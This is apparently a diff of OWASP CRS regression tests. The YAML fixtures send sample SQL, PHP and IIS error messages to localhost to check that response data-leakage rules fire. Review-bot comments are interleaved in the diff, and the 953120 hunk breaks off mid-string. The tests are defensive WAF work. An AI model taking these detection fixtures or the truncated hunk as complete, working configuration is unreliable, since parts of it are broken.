+ description: "Regression tests for rule 951130"
+tests:
+ - test_title: 951130-1
+ desc: "Matching DB2 SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: DB2 SQL Error: SQLCODE=-104, SQLSTATE=42601, SQLERRMC=DECLARE"
+ output:
+ log_contains: "id \"951130\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
new file mode 100644
index 0000000000..64750bbd3c
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951140.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951140.yaml"
+ description: "Regression tests for rule 951140"
+tests:
+ - test_title: 951140-1
+ desc: "Matching EMC SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: '[match sql-errors.data]the used select statements have different number of columns[/match]: [DM_QUERY_E_SYNTAX]error: "A Parser Error (syntax error) has occurred in the vicinity of: select * from dm_folder where folder in"'
+ output:
+ log_contains: "id \"951140\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml
new file mode 100644
index 0000000000..139c38176a
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951150.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951150.yaml"
+ description: "Regression tests for rule 951150"
+tests:
+ - test_title: 951150-1
+ desc: "Matching firebird SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Dynamic SQL Error"
+ output:
+ log_contains: "id \"951150\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
new file mode 100644
index 0000000000..d57698b81f
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951160.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951160.yaml"
+ description: "Regression tests for rule 951160"
+tests:
+ - test_title: 951160-1
+ desc: "Matching Frontbase SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: SQL-status: HY000 [FrontBase Inc.][FrontBase ODBC]Semantic error 217. Datatypes are not comparable or don't match. Semantic error 485. Near: SELECT DISTINCT * FROM SALES WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback."
+ output:
+ log_contains: "id \"951160\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
new file mode 100644
index 0000000000..effc58642c
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951170.yaml"
+ description: "Regression tests for rule 951170"
+tests:
+ - test_title: 951170-1
+ desc: "Matching hsqldb SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)"
+ output:
+ log_contains: "id \"951170\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
new file mode 100644
index 0000000000..8a0dbec48f
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951180.yaml"
+ description: "Regression tests for rule 951180"
+tests:
+ - test_title: 951180-1
+ desc: "Matching informix SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: '[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread "main" java.sql.SQLException: An illegal character has been found in the statement.'
+ output:
+ log_contains: "id \"951180\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
new file mode 100644
index 0000000000..4ca909e711
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951190.yaml"
+ description: "Regression tests for rule 951190"
+tests:
+ - test_title: 951190-1
+ desc: "Matching ingres SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)"
+ output:
+ log_contains: "id \"951190\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
new file mode 100644
index 0000000000..b7212c5ab7
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951200.yaml"
+ description: "Regression tests for rule 951200"
+tests:
+ - test_title: 951200-1
+ desc: "Matching interbase SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']."
+ output:
+ log_contains: "id \"951200\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
new file mode 100644
index 0000000000..03824bd58f
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951210.yaml"
+ description: "Regression tests for rule 951210"
+tests:
+ - test_title: 951210-1
+ desc: "Matching maxDB SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length"
+ output:
+ log_contains: "id \"951210\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
new file mode 100644
index 0000000000..6dc042ea4d
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml
@@ -0,0 +1,48 @@
+---
+meta:
+ author: "azurit, Xhoenix"
+ enabled: true
+ name: "951220.yaml"
+ description: "Regression tests for rule 951220"
+tests:
+ - test_title: 951220-1
+ desc: "Matching mssql SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375"
+ output:
+ log_contains: "id \"951220\""
+
+ - test_title: 951220-2
+ desc: "Matching mssql SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ uri: "/post"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int."
+ output:
+ log_contains: "id \"951220\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
new file mode 100644
index 0000000000..f82cc793a8
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml
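Review bot: Tests 951220-1 and 951220-2 carry the identical `desc: "Matching mssql SQL Information Leakage"`, so a failure report cannot tell the `mssql_query()` warning case from the `Conversion failed when converting` case; the second should name what it exercises, e.g. `desc: "Matching mssql SQL Information Leakage (varchar-to-int conversion error, POST body)"`. 951230.yaml and 951240.yaml in the next two hunks repeat the same duplicated-desc pattern for their `-1`/`-2` pairs. The blank line placed between 951220-1 and 951220-2 is absent from the 951230 and 951240 pairs, so one layout should be chosen across the three files.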
@@ -0,0 +1,47 @@
+---
+meta:
+ author: "azurit, Xhoenix"
+ enabled: true
+ name: "951230.yaml"
+ description: "Regression tests for rule 951230"
+tests:
+ - test_title: 951230-1
+ desc: "Matching MySQL SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'."
+ output:
+ log_contains: "id \"951230\""
+ - test_title: 951230-2
+ desc: "Matching MySQL SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ uri: "/post"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'"
+ output:
+ log_contains: "id \"951230\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
new file mode 100644
index 0000000000..d9e269751e
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml
@@ -0,0 +1,47 @@
+---
+meta:
+ author: "azurit, Xhoenix"
+ enabled: true
+ name: "951240.yaml"
+ description: "Regression tests for rule 951240"
+tests:
+ - test_title: 951240-1
+ desc: "Matching PostgreSQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56"
+ output:
+ log_contains: "id \"951240\""
+ - test_title: 951240-2
+ desc: "Matching PostgreSQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ version: "HTTP/1.0"
+ uri: "/post"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer"
+ output:
+ log_contains: "id \"951240\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
new file mode 100644
index 0000000000..e01973cc6b
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951250.yaml"
+ description: "Regression tests for rule 951250"
+tests:
+ - test_title: 951250-1
+ desc: "Matching SQLite SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94"
+ output:
+ log_contains: "id \"951250\""
diff --git a/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
new file mode 100644
index 0000000000..33c3266ce2
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: "azurit"
+ enabled: true
+ name: "951260.yaml"
+ description: "Regression tests for rule 951260"
+tests:
+ - test_title: 951260-1
+ desc: "Matching Sybase SQL Information Leakage"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10"
+ output:
+ log_contains: "id \"951260\""
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
new file mode 100644
index 0000000000..d01496d554
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml
@@ -0,0 +1,107 @@
+---
+meta:
+ author: "M4tteoP, Esad Cetiner"
+ enabled: true
+ name: "953100.yaml"
+ description: "Tests for rule 953100"
+tests:
+ - test_title: 953100-1
+ desc: "'File size is' leads to FPs, it should not match at PL1"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "Maximum allowed file size is 10 MB"
+ output:
+ no_log_contains: id "953100"
+ - test_title: 953100-2
+ desc: "'Invalid date' Wordpress FP, it should not match at PL1"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "Invalid date selected"
+ output:
+ no_log_contains: id "953100"
+ - test_title: 953100-3
+ desc: "'The function' might lead to FPs, it should not match at PL1"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "please review the function"
+ output:
+ no_log_contains: id "953100"
+ - test_title: 953100-4
+ desc: "'Static function' might lead to FPs, it should not match at PL1"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "This is a static function"
+ output:
+ no_log_contains: id "953100"
+ - test_title: 953100-5
+ desc: "'cannot be empty is too common for PL-1 GH isue #3399"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "Field cannot be empty."
+ output:
+ no_log_contains: id "953100"
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
new file mode 100644
index 0000000000..20f3789d3e
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml
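Review bot: Test 953100-5's `desc` has an unbalanced quote and a typo: `desc: "'cannot be empty is too common for PL-1 GH isue #3399"` should read `desc: "'cannot be empty' is too common for PL-1, GH issue #3399"`, and 953101-5 in the next hunk carries the same defect. The PL1/PL2 pairs are meant to show that one response body is ignored at PL1 and caught at PL2, but 953100-5 sends `data: "Field cannot be empty."` while 953101-5 sends `data: "cannot be empty."`, and 953100-3 sends `please review the function` against 953101-3's `Please review the function`, so those two pairs no longer exercise the same payload; the bodies should be identical across the two files. Within this file the assertion is written `no_log_contains: id "953100"` with an unquoted value, while the neighbouring 951 and 954100 files write `"id \"951110\""`; both appear to be accepted by the harness, but one form should be used consistently.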
@@ -0,0 +1,107 @@
+---
+meta:
+ author: "M4tteoP, Esad Cetiner"
+ enabled: true
+ name: "953101.yaml"
+ description: "Tests for rule 953101"
+tests:
+ - test_title: 953101-1
+ desc: "'File size is' leads to FPs at PL1, it should match at PL2"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "Maximum allowed file size is 10 MB"
+ output:
+ log_contains: id "953101"
+ - test_title: 953101-2
+ desc: "'Invalid date' leads to FPs at PL1, it should match at PL2"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "Invalid date selected"
+ output:
+ log_contains: id "953101"
+ - test_title: 953101-3
+ desc: "'The function' might lead to FPs at PL1, it should match at PL2"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "Please review the function"
+ output:
+ log_contains: id "953101"
+ - test_title: 953101-4
+ desc: "'Static function' might lead to FPs at PL1, it should match at PL2"
+ stages:
+ - stage:
+
input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "This is a static function"
+ output:
+ log_contains: id "953101"
+ - test_title: 953101-5
+ desc: "'cannot be empty is too common for PL-1, it should match at PL-2 GH isue #3399"
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/anything"
+ data: "cannot be empty."
+ output:
+ log_contains: id "953101"
diff --git a/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml
new file mode 100644
index 0000000000..89d5ab3857
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml
@@ -0,0 +1,147 @@
+---
+meta:
+ author: "fzipi"
+ enabled: true
+ name: "953120.yaml"
+ description: "Positive tests for rule 953120"
+tests:
+ - test_title: 953120-1
+ desc: "Just something that returns
+ output:
+ log_contains: "id \"953120\""
+ - test_title: 953120-2
+ desc: "Negative test, returns
+ output:
+ log_contains: "id \"953120\""
+ - test_title: 953120-6
+ desc: "Negative test, returns
+ output:
+ log_contains: "id \"953120\""
diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
new file mode 100644
index 0000000000..d5fb143d70
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml
@@ -0,0 +1,23 @@
+---
+meta:
+ author: "Andrew Howe"
+ enabled: true
+ name: "954100.yaml"
+ description: "Tests for rule 954100"
+tests:
+ - test_title: 954100-1
+ desc: 'Returns C:\inetpub in the response body. Sends as Base64 encoded rather than using /anything to avoid the backslash being escaped in the response.'
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ method: "GET"
+ version: "HTTP/1.0"
+ uri: "/base64/QzpcaW5ldHB1YiAK"
+ output:
+ log_contains: "id \"954100\""
diff --git a/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml
new file mode 100644
index 0000000000..fc38fa89c5
--- /dev/null
+++ b/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml
@@ -0,0 +1,43 @@
+---
+meta:
+ author: "Felipe Zipitria"
+ enabled: true
+ name: "954120.yaml"
